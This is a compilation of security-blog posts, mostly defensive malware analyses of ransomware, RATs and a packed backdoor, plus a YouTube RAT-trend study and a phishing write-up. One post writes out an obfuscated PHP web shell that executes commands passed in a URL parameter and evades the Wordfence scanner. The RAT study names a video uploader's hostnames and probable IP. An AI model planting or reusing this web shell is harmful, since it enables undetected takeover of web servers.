This year has been remarkable for computer security in many ways, while I could list all of the security breaches we were notified upon this year, I think everyone in the security industry cannot disagree mirai was the most noteable for 2016. Covered heavily by major news outlets  due to some of the botnets power, we can now discuss how routers and kettles can destroy the world. There is a larger talking to point why routers, cameras and other ‘smart’ connected devices are poorly made in terms of security which in my opinion can be lack of skilled workforce across the globe, rise of consumerism and the requirement to have produced something on budget. But one thing is for certain, we should be employing more in security, we have left it too late and we must start catching up in 2017.
More often now, box ticking in computer security is no longer an option. We can look at many attacks against large companies like TalkTalk or Tesco which were done in different ways, although Tescos hack is still under speculation. TalkTalk last year produced an embarassing bit of news, they were hit with an SQL injection. When I first heard this I thought it was a joke, especially as it was from the main part of talktalks site and not an obscure location. The only way this could of happened is simply having the bare minimum with security regulation, simply ticking boxes which are usually wide in definition and accepting the rest as risk appetite. In April 2015, I discussed the lack of TLS/SSL within what I will now say is TalkTalk’s communication between it’s customers routers, which could lead to a classic man-in-the-middle attacks (Article). This year mirai attackers decided to utilise the protocol to take over routers in which again, some TalkTalk customers recieved issues. The actual TR-069 protocol that is up-to-date is fairly feature filled with security, although I haven’t extensively researched the protocol. With little to no authentication, certain botnet operators had power we rarely see many have, done in a fairly trivial way which is the most worrying thought. The lack of employed security people doing “background” research (What I call it) in security is astonishing, many technologies that are open source are occassionally reviewed in security because it’s not seen as beneficial to companies that use it. Heartbleed produced in 2014, a reason for why background research is needed. An open source project had a buffer underflow, in a security context, a fairly trivial (again) error. In 2017, I would like to see more companies allowing research to security researchers for more abstract areas like OpenSSL, Mozilla asked Cure53 to analyse cURL, a popular tool used by many in many different circumstances. They found a large amount of vulnerabilties that potentially keeps many companies around the world safe from possible security attacks.
Currently research like this is left to enthusiasts or security analysts who love their job who wish to do more work in the evening (crazy people right?) :). Companies around the world must understand that they should extend their assets to third parties aswell, be it third party alliances which you share information or assets to or a open source library. Many in risk management would see it as acceptable in their risk appetite to simply leave the third party to produce their own security standards (box ticking probably). Cooperation and transparency sound like buzzwords when it comes down to many subjects, but security is so important to every countries economy and well being of individuals that I see it that companies cooperate and be transparent with their research in security, many already do. Transparency in findings allow for others to patch security vulnerabilities and understand attacks they may have recieved recently. Holding back vital technical details does not help anyone except an attacker, this assumes I must admit, that all companies are competent and vigilant with their security, which is not always the case.
A final category I find interesting this year is the recruitment strategies that many companies are employing, I interact with many people with different backgrounds and see two sides of the story. The hard problem in finding the right candidate and the confused pontential candidate who wants to know where to find security jobs. Security recruitment cannot be like other normal recruitment, many talented individuals are not on classic tools like LinkedIn. Recruiters for security must understand where ‘hackers’ are, how to know if someone is struggling with basics and have the ability to know a hacker when you see one. Candidates need to be more open, social and energtic. Hard for security researchers I know, but is a must. Candidates should start a blog, release research, find things you like, produce points of passion and release content regularly. In 2016 I saw a complete disconnect between the two, a potential candidate for a security job, and owners of businesses and security recruiters requiring people with expertise. Some major rules that I go on.
Many achievements have been made in 2016 in regards to security, one is wide adoption in TLS/SSL and further understanding and media attention on encryption overall. Moving into 2017, hopefully we can try and get basic authentication implemented in most manufacturers products protocols.
So the major credit is first to be given to MalwareHunterTeam who initially found this and also analysed it. I will be giving a few more insights that I found interesting in relation to this piece of ransomware. It looks like it was first discovered on the 19th of August and doesn’t look to be very advanced. The sample is obfuscated using Dotfuscator Evaluation which is advertised well in the sample. It is incidentally illegal for them to use it on software on general release, but I’m sure they don’t care about that. This is pretty trivially deobfuscated thanks to de4dot.
It starts a background worker ready to generate it’s key and start encrypting files. From what I see it generates the intilisation vector on the client using RNGCryptoServiceProvider length is set as 16 for cryptographic convention on IV’s to do with the later algorithm. The IV is sent as the parameter ‘public key’ which is confusing because we will be using symmetric cryptography, not public key. The request is sent to a statically set host which is downloadfiles.comuf.com , you may have seen comuf.com and think why they have done this. For all of you who don’t know, comuf.com is a 000webhost domain for free hosting. That’s right, this ransomware is not only not using DGA or multiple hosts but is using a free one.
It also sends with a statically set in the sample user agent, I’m thinking it’s used as a protection system for people sending random requests. Although a client can obviously change their user agent at any time. Sent as a POST, it checks if the request comes back with a status code code of OK (200). And seperates the request body with linefeeds, from the analysis I have done the array turns out to be the key when encrypting files later on.
The ransomware then goes through disks and filters to remove CDROM, NoRootDirectory and Unknown Drives (Ref) it then moves on to finding the files, it will use like most ransomware a list of extensions which are mostly picture, database, archive, office extensions to encrypt for speed. It will not encrypt files in the C:\\Windows folder. It also checks if it contains “bg” in it’s name, if it does it will not encrypt. This is so they don’t encrypt the wallpaper they will use which is called bg.jpg
After encrypting through every file it sees fit it will send a request to complete.php with some basic information such as the IV , name of the machine, operating system, processor, what drives were found and sizes. It also saves the IV on the machine which is saved in the Downloads/Pokemon folder. If we understood the variant of ransomware and the host was up decrypting files would be very easy. I think the author is confusing how public key crypto works, the key is still derived from the intial request and so attempting to use the IV and key in a public key crypto way is not a great idea.
Lastly it will set the Desktop background to bg.jpg and start Pokemon.exe it also has Pokemon music in it’s resources and is played when executed. This piece of ransomware was interestingly targeted towards Pokemon users obviously trying to get on something that is current and popular for people to download and execute. The actual malware itself was bad in many ways which is good from a defense perspective, the attacker does not seem to be sophisticated. The worrying thing about this is that you do not have to be too sophisticated in coding or hacking to produce something that may make small businesses or individuals pay up.
I was notified of a recent sample which has been dubbed as a “reborn” version of Hawkeye Keylogger. The developer in question repeatedly shows poor understanding of web application security and lacks any real innovation in keylogger malware. Despite this many decide to purchase this malware for many reasons. Many different users have taken on the project of ‘Hawkeye’, the latest is a malware developer who created the quite laughable ‘iSpy’ software.
Hash – SHA256 :
While I’ve been looking further and further into remote administration tools I decided to step back for a moment and look it from a general point of view. I’ve been focusing on three RAT’s at the moment; Imminent Monitor, Nanocore and Luminosity Link. These are advertised on a US forum and discussed on english speaking forums, although distributed around the world, the main audience for these are western developed countries.
I looked into YouTube and made some queries, I set the queries to be filtered to a month so I know what’s recent. Some of videos relating to the RATs were not relevant to the software in question, but I can’t filter out all of it. It should be looked at a general point of view, and most of the discrepancies were from the small portions of the research, which we won’t be focusing on. The idea for looking into what’s being discussed on YouTube is that it gives some insight onto trends. For example, PoisonIvy, a very dated RAT isn’t discussed too much on YouTube anymore with just 88 counts of videos in the past month. While njRAT is the clear leader of what is being discussed on YouTube, the content uploaded is usually from eastern countries like Syria, Egypt and Turkey (not exclusively).
The amount of video content in March 2016
NjRAT – 1,560
darkcomet – 771
blackshades – 22
netwire – 3
luminositylink – 11
nanocore – 48
babylon rat – 393
cybergate – 133
xtreme rat – 379
poison ivy – 81
bozok – 8
A large portion of these videos are in Arabic, and give some insight into other countries around the world and what is relevant to them. It is noteable that many of the videos uploaded from eastern countries point to Facebook profiles or Skype contacts that provide further information about the individual, some of these obviously won’t be sophisticated attackers. As well as corporate security I am also interested in individual’s security and so this is still relevant, many videos uploaded about RATs leak out information about the uploadee or the clients they hold. For example an Arabic video explaining njRAT surfaced on YouTube on the 21st March, he first explains about a VPN and goes through various steps to finally created a dynamic host. lala123.no-ip.biz, correlating IP is 188.8.131.52 which is the VPN’s IP (Hostname: 33-153-255-141.dynip.ipjetable.net).
Further on into the video we find that he uses the NO-IP client and spills some of his previous names his used with NO-IP, one of them being MAF12.no-ip.biz, this correlates to a different IP (184.108.40.206) which is owned by an Algerian telecom. While we can’t make too many assumptions, the probability of that being his IP is quite high. We can learn other things about malicious software from YouTube as well, although RATs are more commonly shown than other forms. There are ofcourse many other streams of information available on the internet, some more accurate and concise.
I can take a few things from this information. Attackers are still using very outdated, broken, ill-featured software and is distributed widely for further usage, especially in eastern countries. Remote administration tools trickle down if they are free but are rarely used if they are ‘premium’ RATs, even if they are cracked. Even though remote exploits have been found for Darkcomet, users still persist in keeping Darkcomet alive, most likely because it’s well known for being free.
There are ofcourse exceptions and maybe even contradictions from the statements I’ve made, but researching on YouTube is an essential threat intelligence tool in my eyes as attackers become older and remember the tools they’ve used before. YouTube is a platform where users can learn about such tools without breaking through the barriers of forums or extensive searches.
That’s all from me, thanks for looking.
My last post got a very positive response which is great, I actually had an interesting talk with the author who graciously gave me a license to analyse the remote administration tool. The user proceeded to tell me any licenses who use the tool maliciously will be banned, and the primary purpose is for system administration (Internet Cafe etc.). Note: Class names and method names are translated from de4dot character deobfuscation.
The cracked version has a lot of broken features and is partly deobfuscated in the first place, this gives AV’s and defence providers a positive as it’s much easier to detect. The original version has some normal tricks to start off with, involving LZMA and XOR. But first, from the builds that I’ve seen Imminent has some static methods which allow us to know that this is Imminent. It gives us a hello message. Other methods have their characters obfuscated in the <module> but notice has a “Hello”.
Imminent has 3 resources which will be used for unpacking, a combination of LZMA and XOR are used as I said. A interesting algorithm popped up again which I talked about in the last article. I didn’t deobfuscate the characters this time so it looks a little crazy but it’s essentially the same thing.
This operation is used before it decompresses a resource file using LZMA. The key is different to the other one I stated in my earlier article. The key this time is !!@@##$$%%^^&&**(())__++ this brings a obfuscated binary which can have it’s characters substituted in de4dot much like the original binary. Extracting the config for the particular build is a little bit challenging and involves <Module>.byte_0 which is commonly referenced through the assembly. The image does not show all the methods that use byte_0.
A large amount of unsigned integers are used which I suspect are used towards the configuration. They drastically change in each build, and config decryption has many methods in amongst one another. It is assigned with the use of smethod_29, this method is where it tranforms unsigned integers into a readable config. The main method inside smethod_29 is method_4, which after being run shows us the config in all it’s glory. Incidently this also used as well for an executable which will look at in a moment.
We can see a lot of things in the config such as the host, startup entries and mutex. One of the interesting things we should look for while conducting an analysis is the build settings and version. The build settings are nicely formatted together making it easy to read and the version is very obvious to see, the above image is 4.2.
The assembly that also uses smethod_29 references all the dll’s IM needs for more of it’s advanced operations. Calls to an injector, lzloader, video and client plugin are within the resources of a decrypted binary after using smethod_29.
One protection mechanism the RAT makes is to ensure the process is made critical, if the process is to be terminated, denial of termination is made or a blue screen arrives to the user. The blue screen would like something like this, and would occur straight after the termination of the process.
The components for this are in “class10” which import some API’s to achieve this operation in c#, it’s not a new technique and can be found in a lot of RAT’s to keep it unkillable. dll’s imported are kernel32.dll for getCurrentProcess, advapi32.dll for GetKernelObjectSecurity and SetKernelObjectSecurity also ntdll for NtSetInformationProcess. NtSetInformationProcess is an undocumented function in Windows and can be used to make the process appear as critical. Any executable downloaded from the internet using this API should not be run until further analysis.
Imminent Monitor is easily identifiable as it spits out some simple unique strings. It has a vast amount of functionality such as torrenting, reverse proxy, remote desktop, keylogger and so on. Imminent prints this out to itself, because of the amount of items saying ready, we can create a signature to say if all of these strings are in memory, it is more than likely malware and is Imminent. We can also use this strings to identify what class is what function. I would advise sysadmins and malware researchers to use these strings for YARA rules and such, they are unique and have quite a large amount of them, “Ready” strings.
If you wish to be protected from IM cracked or original, it is by far hard. I’d like to thank @MalwareHunterTeam for the swathe of samples recieved which allowed me to see the malware from a much broader picture. It seems looking into RAT’s this year has been fairly successful and I hope it continues.
As I stated in this video I’m going to be focusing much more on RAT analysis. My reasons are given in the second portion of the video for anyone who is interested. I decided to look at a fairly popular RAT called ‘Imminent Monitor’. I downloaded the cracked version which many should note as this may differ from the original in some ways, I’ve tried to only include things which I’m sure are wrong with the original as well. There is something positive about analysing cracked malware, as the majority of criminals probably don’t want to pay for RAT’s.
Darkcomet RAT is still actively used today even though it is no longer developed and has been proven to have exploits in this. With this in mind, this version of cracked software will most likely distribute around the internet and be used more than the paid version due to it simply being free. I thought I was going to have a fairly long wait to find how to extract the config out of the RAT but it was really as easy as 1-2-3. Literally looking at the first classes constructor.
I was able to see port, ip/hostname, startup key, startup name, startup location, mutex and version (and other less important things).
One of the first threat indicators I can provide to malware guys is that Imminent RAT creates a folder which is always the same, it is quite unique. It creates a directory called “Imminent” in the application data of the current user. This does not hold the executable but instead holds information to be sent over to the client. Like logs.
The binary uses cases to make it harder for researchers to make out whats going. Imminent uses a XOR like function but to what I see isn’t exactly XOR. I’m thinking of creating a deobfuscator for this sort of code later on, but for now I solved it manually, which wasn’t particularly challenging. The more I look at it the more it looks like XOR, but I’m terrible at checking these things so I’m just going to call it XOR-like.
This XOR like functions is used to encrypt logs and other parts included in the “Imminent” application data. I successfully tested my algorithm against the original and got the same result, this was also verified by breakpointing the function to where it was encrypting to make sure the plain text was the same.
With the same algorithm we can decrypt logs that Imminent creates. It does it by a format of month/day/year, showing the author could be American origin. An interesting thing about the use of what looks to be XOR is the key provided for the operation, the developer decided to use “sampleKey”. Or did he? A person who doesn’t copy and paste an algo usually chooses a different key than sampleKey, infact someone who does copy and paste an algorithm usually changes the key.
byte path = System.Text.Encoding.UTF8.GetBytes(“C:\\Documents and Settings\\L!NK\\Local Settings\\Application Data\\Startup Folder Name\\MyFile.exe”);
byte pass = System.Text.Encoding.UTF8.GetBytes(“sampleKey”);
byte ax = xorlike(path, pass);
public static byte xorlike(byte byte_1, byte byte_2)
int num = 11;
int num5 = 13;
int num3 = 257;
int num6 = byte_2.Length – 1;
for (int num7 = 0; num7 <= num6; num7++)
num3 += num3 % (int)(byte_2[num7] + 1);
int num4 = byte_1.Length – 1;
for (int num2 = 0; num2 <= num4; num2++)
num3 = (int)byte_2[num2 % byte_2.Length] + num3;
num = (num3 + 5) * (num & 255) + (num >> 8);
num5 = (num3 + 7) * (num5 & 255) + (num5 >> 8);
num3 = (num << 8) + num5 & 255;
byte_1[num2] ^= (byte)num3;
result = byte_1;
I’ve decided to show an example of it’s operation. You can use this for any defense against Imminent if you choose to make one. The code is obviously deciding to encrypt the startup path and saved in the Imminent folder as “Path.dat”, a rough location of a user is also saved “Geo.dat”, which uses a site called iptrackeronline.com to longitude, lattitude, city and finally country.
I discovered a file which deals with processes, I’m not sure at the moment, if its the file updater, download and execute or persistence. I’m more leaning towards it being a process watchdog but have many things to explore. I discovered it here:
Turns out there is a base64 string which is then decompressed using the LOADLZ library it has with it. There’s a reason why this thing can be 400kb.
The file was written in C++ which is interesting as most .NET malware doesn’t drop anything like C++, turns out to be a dll which I assume is injected for persistence, although as I say I don’t want to rule out anything yet.
I couldn’t debug in Immunity properly because I use an XP machine with some of the C++ redistributables not installed. This file required GetModuleHandleEx which was provided in 2011 from my research, but I might be wrong.
I’m not going to show a lot of IDA, but it checks for a debugger, creates a thread, opens processes and creates them too. It is also uniquely identifiable because of some of the strings that are given. That is indeed a md5 hash which is “killswitch” in plain text.
You can see that correctly, the file is also FUD and still is as I write this article 3 days later.
I was starting to test out how I could break Imminent Monitor as well and found that the RAT does not like showing files when a file is out of its format, I named a file in the keylogger file “ao” and entered a small amount of data. It proceeded to not show any of the keylogging files that were available to it. This is it in a broken state.
This is it in the normal state.
The task manager disabler functionality that Imminent provides is also quite bad. It simply executes the task manager and makes it invisible. Not exactly to rootkit standards, but I guess does the trick to the average joe?
In the cracked version the process protection is broken or non-existant, I am able to kill the process with ease. I am to do more research on Imminent Monitor, it’s been fun to look at so far and I haven’t looked through all of it because of time constraints in my life. What I have provided is some threat indicators for AV’s so that this RAT can be removed from peoples computers with ease, even if crypted. The static path declaration provides an opportunity to remove this RAT from most machines.
I’ve been looking more at how Imminent can be broken remotely, I’ve had a few sucesses with random things, but must look at them in more depth before I decide to release them publicly. A reminder for anyone reading this, if you have an original build that isn’t from a cracked client, I would like to have it so please contact me.
Thanks for looking.
Remember a time where people said you should look at the address bar to verify whether or not it’s a phishing attempt? A friend of mine recently got an email which is fairly interesting to me. This attack provides a decent amount of SE to make a user think it’s a legit, correct, the green “padlock” isn’t there, but google.com is.
It all started with a email which looked to be fairly normal, the one problem with it is ofcourse is the Google attachment. I don’t use Google as a provider for this email and so having a Roundcube email client and Google attachment doesn’t work out. The attackers are just taking into account the majority of people will be using Google accounts and so it’s worth making something look like this.
The problem is that it’s an image and it goes to somewhere which isn’t Google, I can see this by viewing the source of the email.
The URL is redirected twice until it reaches its destination, pretty common with phishing attacks most likely so they can dynamically redirect if a site is reported on and falls down. The code here refreshes and uses the data: functionality that browsers have available. There are spaces from the google.com text to the <script> tags, this is to ensure that the browser shows only the Google text in the URL bar, making it deceptive to most people. The text in the URL isn’t actually the location, but infact code itself.
Finally the code is resolved as a simple iframe which simply copies the Google code and ensures it’s sent to 1.php, a fairly normal name for a form phishing attribute, they are usually very lazy.
The final result? You’ve already seen it but it’s rather convincing to a person who isn’t to confident with computers. Maybe we need to have a look at modifying how data URI’s are used. Here’s a video showing it live.
First of, I’d like to say that Wordfence have a pretty cool product and most people who intrude into someone’s server won’t take this much effort to hide themselves. Most hackers who upload PHP shells usually just stick with a generic one they’ve downloaded from a super priv8 hacker forum. Still, this shows how trivial it can be to bypass some systems.
For those of you who don’t know what Wordfence is, it’s a leader in it’s field, a security plugin for WordPress which boasts over a million installs. This post doesn’t talk about how a PHP file has come onto the system, be it a vulnerable plugin or another part of the website, this is more on the detection of malicous files. Malicous script detection is a mammoth task, but is made easier by some hackers who simply upload they’re shell which is base64’d and eval’d. The way I evaded detection would primarily be used if the target was especially valuable, such as a government wordpress site or a multi-million pound company. Also take into account other security mechanisms that an administrator may put in place, this is no ‘oh shit’ moment.
That said I was able to bypass in under an hour, I suspect mostly because it relies on signatures that have previously been marked as malicous, which is great, but isn’t as effective as some may think when ‘professionals‘ wish to stay on the server. At first I simply tried something like this:
Some detection systems have problems understanding the capatalisation of letters and so I thought this would be a good start, passthru works much like the exec or system function. To my knowledge exec and system are used more often and so I wanted to test out to see if all functions are found as malicous, indeed this was the case. I then tested with a few web shells that I had which were obfuscated in various ways, shells like C99 or WSO for those interested, they were also detected successfully.
I then noticed that the eval function was not intially flagged up as malicous activity, which is perfectly right, because many web applications may need this function for purposes that aren’t malicious. I then looked at how I could trick or atleast have something that was a little different from other obfuscators/malicious code. I thought that manipulating the strings in certain way was a good way to start, but did not attempt to involve the functions base64_decode or gzdeflate, as the combination of these and eval would surely flag something up (although I haven’t tried, give it a go?). I first brought some filler variables into the mix, this is quite common in exploit kit code and executable crypting, where the variables are either blank or are never used to make the code seem legitimate.
$a = “”;
$b = uniqid();
I then declare variables for later use, I would use str_shuffle to shuffle the characters around, but it wouldn’t matter because it would bring the output whatever I did, it is almost a form of primitive polymorphism.
$a = “aA”;
$se = “sS”;
$b = “bbBbBb”;
The b’s were filler like the above code, it was never going to be used, but $a and $se would, as the characters ‘a’ and ‘s’ are in the function passthru. The main aim of my code is to have the eval function basically call the first code passthru($_GET[‘x’]), but in a different way. With the the next two lines I decided to start using english sounding names to make it look less generated or obvious. I used the metaphone function to get some of the characters used in the code, in this case ‘t’ and ‘p’.
$tea = metaphone(“0-ttttttt-ttttt”);
$patrol = metaphone(“………..p”);
I then used the strip_tags function to get the combination ‘hr’ and ‘u’. Very simple function that probably hasn’t been used for malicious purposes like this before, what I was really trying to achieve was a completely unique payload.
$ru = strip_tags(“<a>hr</a>”);
$uare = strip_tags(“<b>u</b>”);
I then resorted to using the chr function which corresponds with ASCII, which I used for some of the characters like [ ] () and ‘, I later used some basic maths to get values with the chr function to add some difference to them.
$cake = chr(40);
$biscuit = chr(41);
$coffee = chr(36);
$family = chr((80+1) + (8 * 1) + (1+1));
$tree = chr((70+11) + (8 * 1) + (1+3));
$bark = chr(40-1);
I concatenated the first few variables to make the function which made it look like this:
I then included the remaining parts into an array like so:
All I had to do after this is simply put all of the variables in the right combination to make this work which was:
With this code I could now successfully execute some commands remotely. Like so:
I scanned with the latest version of Wordfence and it found no malicious scripts. SUCCESS!
$a = “”;
$b = uniqid();
$a = “aA”;
$se = “sS”;
$b = “bbBbBb”;
$tea = metaphone(“0-ttttttt-ttttt”);
$patrol = metaphone(“………..p”);
$ru = strip_tags(“<a>hr</a>”);
$uare = strip_tags(“<b>u</b>”);
$cake = chr(40);
$biscuit = chr(41);
$coffee = chr(36);
$under = strip_tags(“<p>_G</p><i>”);
$family = chr((80+1) + (8 * 1) + (1+1));
$tree = chr((70+11) + (8 * 1) + (1+3));
$bark = chr(40-1);
$bench = ($patrol.str_shuffle($a). str_shuffle($se). $tea. $ru. $uare);
$park = [$cake, $biscuit, $coffee, $under, $family, $tree, $bark];
The most popular security system for WordPress was unable to identify the malicous code I created, It is rather hard to differentiate with PHP what is malicious and benign as shown here, even if code analysis is used as advertised by Wordfence. UnPHP was unable to handle how I was obfuscating my script as well. It’s not of upmost importance, as many hackers don’t go past the norm with PHP shells, but it is something to think about.
I haven’t updated this blog with some malware analysis for a little while, nothing interesting has come to my attention really, I do only have a limited field of view too as I am a student and not an AV. I found this peice of malware that I am about to show a little funny, some simple tricks that malware authors use that they just can’t shake off, one of them being the use of UPX. And yes, this did have a digital signature with it.
I don’t exactly know the origins of this file as I got it from a malware sample website, I don’t think this could pass off as an Email client from Microsoft, but that’s just me I guess? 🙂
So I unpack the UPX file and look at the resource section of the executable. I find a value called “KIT” which has what seems to be some other packed or encrypted data. What I find out is this is a DLL file.
I survey what imports this peice of malware has in IDA I then use Immunity to debug the application, looking at the executable in the debugger I can see that CreateProcessA is going to be used. I breakpoint here to see what’s being created and find that a simple command line arguement is being used to launch the same process with just the additional arguement. The arguement is funnily enough called “launch”.
Running through the program a little bit until we get to an interesting part where the register shows the all too common “PE” string right before allocating some memory. I follow to the dump to see what is there and am shown what seems to be a exe or dll. Remember the “KIT” that we saw a few pictures back? Seems like we’ve found the unpacked version here.
I select all from the dump and save to file, I can edit it later with a hex editor (HxD) to take out the parts that aren’t to do with the DLL. The DLL is initially packed with UPX which is obviously again, trivial to unpack. A little look at my trusty Exeinfo confirms it is indeed a DLL we have extracted. As we can see the malware has used UPX quite a lot, this is mostly because it wants the smallest size possible for it’s executable and DLL. I’ve said this before on the blog, UPX can bring detections to an executable and so a user would have to crypt which would probably inflate the file again. Ah, the problems of malware hey? I’d also like to say that the exe name wasn’t the malware authors choice, that was me who named it simply “ok.exe”, I’m imaginative I know.
Another easy trick that the developer has done is implement base64 to make sure some strings are obfuscated somewhat, as we all know, base64 is also quite trivial to decode. Most of the strings were API’s, they also base64’d the dll’s they were to import too. Funnily enough, the server ip to send information to wasn’t encoded or encrypted in any way, which I guess is fine. Most likely so researchers and AV’s can’t see the imports straight away.
A short little loop to decode the base64 strings which is shown here after adventuring into the DLL a little bit.
A little after we have found and decoded all the strings we need to load the decoded DLL’s so we can call the API’s and get down to business. A similar sight for anyone who has looked at malware before.We begin to start putting stuff into buffers seems like we’re going to create a file with some information and contact home soon, we’re wsprintfa heavily in this section of the code. The host seems to be down, I don’t know how fresh the samples are.
The malware checks if a file called test.1 is available at C:\ which it won’t and then proceeds to search files in the directory it’s currently in, it also goes and attempts to adjust it’s token privileges allowing it to have more control. It will then create a mutex with a M contactenated with the IP address and port it is supposedly going to connect to, a bit different.
It has also been checking for Readme.txt in the directory and eventually creates a randomised folder name as shown here. This is where I’m guessing the malware will choose to reside and check again whether it has a running instance already on the computer.
When I mean random there is nothing random on a computer, essentially it is though. Here I show the function the malware uses to create directories and files. It has an interesting pool of characters to choose from, I’ve simply highlighted a loop for you, the pool is very different from others you may see.
It proceeds to create what seems to be randomised folder names and finally creates the file Readme.txt, it then moves the exe from it’s original location to here. It has changed the folder “vv71” attributes to hidden, like most malware, so it’s harder to find. After it’s moved all the files, it wishes to sleep for 5000ms, this is quite common in malware as AV’s may pick up suspicous activity and begin to monitor it. After this, it launches the process in it’s new location to verify it’s made it, after it can verify all this, it will begin to start using the good ol’ WSA_STARTUP.
We obviously need some information we want to send back home and one of them is the version of the operating system. Interesting to see how low this malware had on it’s list such as NT and 2000.
The malware creates threads and sets the timeout as infinite which is annoying, there is no response as the ip is dead so it is a bit of a job modifying all the values allowing me to carry on analysing this. But almost all of the techniques used in this malware are very simplistic, although written in C++, this may be the developers first or one of the first peices of malware written.
In the threads there is one function which is seperate to the base64 function we looked at previously, it ends up being a common registry value for the startup. From what I can see, this particular strand of malware only creates one startup registry key.
A really interesting part of this malware is that it may of originally of exploited predominantly Japan, it ends up attempting to redirect a few .jp domains to a different IP. Although it’s placed in a different file from the original etc/drives/host file, so cannot confirm, it seems this is what the intended behaviour is though.
That’s all I have time for now, interesting to see the differences in malware and techniques, but in this particular strand, it seems like the old tricks die hard. Very generic.
I would first like to credit TrendMicro with their initial research on FighterPOS. There have been an emegerence of new domains for FighterPOS recently and I discovered a whole load of other possible domains that could be used for the command and control. This particular peice of malware uses a open source VB6 peice of malware called ‘vnLoader’. The author of FighterPOS has either got himself or asked someone else to create a modified version to use as POS malware.